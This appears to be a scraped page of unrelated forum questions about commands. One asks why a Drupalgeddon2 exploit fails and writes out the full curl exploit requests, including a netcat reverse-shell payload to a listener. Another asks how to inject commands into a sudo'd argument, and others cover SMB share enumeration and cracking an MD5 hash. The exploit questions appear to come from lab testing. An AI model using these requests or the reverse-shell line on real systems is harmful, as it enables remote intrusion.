Is this bash command vulnerable to code injection?

I’m wondering if the following code is vulnerable to command injection in bash :

sumo /bin/netflash -Uk $  CONTROLED_OPTION 2>&1 

I’m thinking since it’s not included in ” ” it should be vulnerable but I’m not sure since I can’t make the command injection work, I tried $ () `` | && ||  but nothing is working.

or do I need the command to be inside a eval to be vulnerable ?

Thanks

Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine.

the requests:

-curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \ --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id .  -curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/$  {form_build_id}" \ --data "form_build_id=$  {form_build_id}". 

execute along with any other command (ls,cd…) and print a result.

but when I send the curl request:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc-e/bin/sh 192.168.204.128 5555'--data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id . 

It doesn’t print anything (form_build_id) not even an error, and the target doesn’t connect to handler. where do you think is the problem?

I have tried other payloads, and they result in the same things.

nmap doesn’t run script command?

When I run the command as:

nmap --script=smb-enum-shares.nse 192.168.253.18 

the output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 15:18 +03 Nmap scan report for 192.168.253.18 Host is up (0.041s latency). Not shown: 983 filtered ports PORT      STATE SERVICE 53/tcp    open  domain 88/tcp    open  kerberos-sec 135/tcp   open  msrpc 139/tcp   open  netbios-ssn 389/tcp   open  ldap 445/tcp   open  microsoft-ds 464/tcp   open  kpasswd5 593/tcp   open  http-rpc-epmap 636/tcp   open  ldapssl 3268/tcp  open  globalcatLDAP 3269/tcp  open  globalcatLDAPssl 3389/tcp  open  ms-wbt-server 49154/tcp open  unknown 49155/tcp open  unknown 49157/tcp open  unknown 49158/tcp open  unknown 49167/tcp open  unknown  Nmap done: 1 IP address (1 host up) scanned in 57.47 seconds 

Nmap doesn’t show the shared directories. What am I doing wrong?

verification of certificate chain using openssl verify command

When attempting to verify google server’s certificate chain using openssl, I am getting error.

Extract google’s server and intermediate certificates:

$ echo | openssl s_client -showcerts -connect www.google.com:443 | sed -ne ‘/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p’ > /tmp/server_certs.crt

Extract google’s root CA from jdk:

$ pwd

/cygdrive/c/Program Files/Java/jdk1.8.0_231/jre/lib/security

$ keytool -export -keystore cacerts -storepass changeit -alias ‘globalsignr2ca [jdk]’ -file /cygwin64/tmp/google_root.der

$ openssl x509 -in /tmp/google_root.der -out /tmp/google_root.pem -inform der

Also extracted google’s root certificate from chrome browser to /tmp/google-chrome-root.pem. Doing a diff between chrome’s root certificate and jdk extracted root certificate, there is no difference

$ diff /tmp/google_root.pem /tmp/google-chrome-root.pem

$ Based on this, I know, I am using the right root certificate.

Invoke openssl verify

$ openssl verify -CAfile /tmp/google_root.pem /tmp/server_certs.crt

C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com

error 20 at 0 depth lookup: unable to get local issuer certificate error /tmp/server_certs.crt: verification failed

I know verification through

$ openssl s_client -showcerts -servername www.google.com -connect www.google.com:443

is successful

CONNECTED(00000005) depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign verify return:1 depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 verify return:1 depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com verify return:1 

and was expecting a similar successful result through the openssl verify command as well.

I am doing this exercise in windows 10 and cygwin.

How in command “Reformat Code” of PhpStorm use only spaces?

Hello,
In my vue page PhpStorm 2019.2.3 with eslint used
Running command "Reformat Code" I got error in my app:

./src/views/About.vue Module Error (from ./node_modules/eslint-loader/index.js): error: Mixed spaces and tabs (no-mixed-spaces-and-tabs) at src/views/About.vue:177:2: 
Code (markup):

Looks like this command use tab symbol for ident spaces and I did not find to to make that command "Reformat Code"
will use only spaces?
I found these
https://imgur.com/
options

But I do not any option…

How in command "Reformat Code" of PhpStorm use only spaces?

How to apply command to all elements of a list?

So I generated a list of cities and I want to apply FindGeoLocation to all of them without having to seperate the elements and then applying.

y= CityData[{Large, Last[x]}]  

(x here is dynamically updated from

x = RandomChoice[CountryData[]]]  TextString@y 

Gives me a list of the Cities.

But now I want to take the list and have FindGeoLocation evaluate it at all the given cities in the list.

As far as I know, Map does that with functions. I don’t know what to do next.

Using Lean Theorem Prover from command line [closed]

I have read this link about using Lean: https://leanprover.github.io/reference/using_lean.html and am able to use Lean with VSCode, but I still have questions about using Lean from the command line.
1. When I download the lean binaries, there is a lean and leanchecker binary. What does each one do, and is there any documentation on using them?
2. What is LEAN_PATH? I wrote a Lean file that uses the Lean library list type. I want this to to be checked from the command-line, that is when I write a #check command in the file, on VSCode the #check is underlined in blue letting me know that it checks; I want to do the equivalent from the command-line. But when I run the Lean binary on my file, it says ‘error: file ‘data/list’ not found in the LEAN_PATH’. Now, I have the entire Lean repository (https://github.com/leanprover/lean) in my system and it also contains the built binaries – this is what it took to get Lean to work on VSCode (that and telling VSCode where the head of the repository is). Also, the head of this repository is in my PATH but what does it mean for data/list to be in my LEAN_PATH?

I’m not able to find documentation for these specifics, most of them talk about using Lean from VSCode or Emacs. If I missed it, please point me to the right resource. Thanks!

Finding original command result from MD5 hash

Basically I hashed the result of the “date” command with md5sum:

$ date | md5sum

The output is indeed in the likes of:

e4c94362cd4fd71ec6aca78c7411bdc3 -

My question was: is it possible to recover the result of the date command knowing the date pattern (except for maybe the minutes and seconds)?

I tried using john’s mask option as well as a custom wordlist, without result.

Do you guys have any idea how we could pull that off?